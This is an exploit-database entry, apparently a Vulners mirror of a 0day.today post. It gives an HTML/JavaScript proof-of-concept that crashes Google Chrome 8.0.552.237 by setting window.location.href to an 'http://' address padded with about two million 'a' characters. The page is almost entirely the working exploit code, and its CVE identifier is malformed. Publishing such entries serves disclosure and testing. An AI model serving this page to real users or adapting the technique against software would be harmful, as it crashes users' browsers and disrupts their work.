Lucene search
K

Google Chrome v8.0.552.237 address overflow DoS

🗓️ 19 Jan 2011 00:00:00Reported by Vuk IvanovicType 
zdt
 zdt
🔗 0day.today👁 13 Views

Google Chrome v8.0.552.237 address overflow DoS CVE-2011-012

Code
<html>
<head>
 
 
# Title: Google Chrome v8.0.552.237 address overflow DoS
 
# CVE-ID: ()
 
# OSVDB-ID: ()
 
# Author: Vuk Ivanovic
 
# Published: 2011-01-17
 
# Verified: yes
  
 
# Google Chrome v8.0.552.237 address overflow DoS
 
 
#
# Tested on: Windows XP, SP2 (EN), Windows 7 x64
 
#
# Date tested: 01/16/2011
#
#
#
 
# Discovered by: Vuk Ivanovic(musashi42)
#
##
 
<script type="text/javascript">
 
function mul3 (str, num) {
    if (!num) return "";
    var orig = str,
        soFar = [str],
        added = 1,
        left, i;
    while (added < num) {
        left = num - added;
        str = orig;
        for (i = 2; i < left; i *= 2) {
            str += str;
        }
        soFar.push(str);
        added += (i / 2);
    }
    return soFar.join("");
 
}
 
var junka = "a";
 
var junk = mul3(junka,2097033);
 
 
window.location.href = "http://" + junk;
 
 
</script>
</head>
 
<body>
 
</body>
</html>



#  0day.today [2018-03-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation